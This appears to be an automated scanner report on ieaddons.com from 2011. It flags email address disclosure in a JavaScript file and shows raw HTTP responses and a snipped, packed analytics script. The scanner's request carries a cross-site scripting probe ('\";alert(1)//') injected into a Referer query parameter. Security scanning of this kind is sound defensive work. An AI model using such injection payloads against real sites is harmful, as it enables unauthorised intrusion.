Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Dec 2011 04:41:05 GMT
Last-Modified: Sun, 04 Dec 2011 03:41:05 GMT
Location: /en/addons/default.aspx
Vary: *
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=g5xwubrgsbt2cg2t5smqi5p5; path=/; HttpOnly
Set-Cookie: ie8_webslice_anonymous=e6fba7c8-553f-45ac-89e6-e092d3fa8044; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 04 Dec 2011 03:41:04 GMT
Connection: close
Content-Length: 140

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/en/addons/default.aspx">here</a>.</h2>
</body></html>

6. Email addresses disclosed  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ieaddons.com
Path:   /en/assets/js/s_code.js

Issue detail

The following email address was disclosed in the response:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

GET /en/assets/js/s_code.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://www.ieaddons.com/en/addons/detail.aspx?id=790&44de6%22%3balert(1)//fff30f29ff4=1
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.ieaddons.com
Cookie: ASP.NET_SessionId=iw4fjtemgtal52ogp31lo42q; ie8_webslice_anonymous=6fd6c5a3-83c3-4d69-95bb-099a5f055d79

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 30 Nov 2011 21:10:30 GMT
Accept-Ranges: bytes
ETag: "5ca4ac7da4afcc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 04 Dec 2011 03:41:02 GMT
Content-Length: 31606

...


...[SNIP]...
;@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+"
+"s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@"
+"X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s
...[SNIP]...

Report generated by XSS.CX at Sun Dec 04 08:40:18 CST 2011.